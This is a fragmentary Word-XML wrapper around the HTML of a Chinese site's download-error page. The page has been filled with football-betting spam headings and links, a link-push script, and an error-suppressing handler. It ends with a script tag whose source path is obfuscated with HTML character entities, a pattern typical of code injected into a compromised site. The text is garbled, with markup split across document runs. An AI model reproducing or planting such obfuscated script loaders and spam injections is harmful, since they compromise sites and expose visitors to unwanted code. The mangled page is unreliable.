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#&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN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//www.w3.org/TR/html4/loose.dtd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="//www.w3.org/1999/x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 &lt;meta name="keywords" content="keywords_temp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"description" content="description_temp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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>提示信息</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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#webadvjs#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href="/_css/error/error.css" rel="stylesheet" type="text/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/_js/themes/default/easyui.css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script type="text/javascript" src="/_js/jquery.mi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link rel="stylesheet" type="text/css" href="/_js/themes/icon.css" /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jquery.easyui.mi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easyui-lang-zh_C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common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script type="text/javascript" src="/_js/securit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var V_PATH="/";window.onerror=function(){ return true; }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&lt;h1&gt;&lt;a href="http://www.zuqiuxiazhu.com/"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>下注足球</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>&lt;/a&gt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input id ="ipAddress" name ="ipAddress"  type="hidden" value="10.108.67.165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  date-time="1743675677"   dir="dikcfe" class="wp_error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3675677"   dir="uyhjsu" class="wp_error_imag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src="/_images/error/error.gif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3675677"   dir="hunjdr" class="wp_error_ms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&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>提示：下载文档出错！</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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  date-time="1743675677"   dir="xahagq" class="wp_error_butt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main"&gt;&lt;a href="#" onclick="toMain('/');"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>下注足球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span class="close"&gt;&lt;a href="#" onclick="closeWindow();"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>关闭此页</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>&lt;/a&gt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Ma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toReLogin(url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$.post("/_web/_ids/login/api/logout/create.rst?_p=YXM9MQ__&amp;tt=" + Math.random(), function(result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window.top.location.href = url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function closeWindow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ndow.top.clos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/div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&gt;</w:t>
        <w:br/>
        <w:t>(function(){</w:t>
        <w:br/>
        <w:t xml:space="preserve">    var bp = document.createElement('script');</w:t>
        <w:br/>
        <w:t xml:space="preserve">    var curProtocol = window.location.protocol.split(':')[0];</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if (curProtocol === 'https'){</w:t>
        <w:br/>
        <w:t xml:space="preserve">   bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  else{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  bp.src = 'http://push.zhanzhang.baidu.com/push.js';</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t xml:space="preserve">    var s = document.getElementsByTagName("script")[0];</w:t>
        <w:br/>
        <w:t xml:space="preserve">    s.parentNode.insertBefore(bp, s);</w:t>
        <w:br/>
        <w:t xml:space="preserve">})(); </w:t>
        <w:br/>
        <w:t>&lt;/script&gt;&lt;script  type="text/javascript" charset="utf-8"  rel="nofollow" src="&amp;#47;&amp;#119;&amp;#101;&amp;#98;&amp;#116;&amp;#106;&amp;#50;&amp;#46;&amp;#106;&amp;#115;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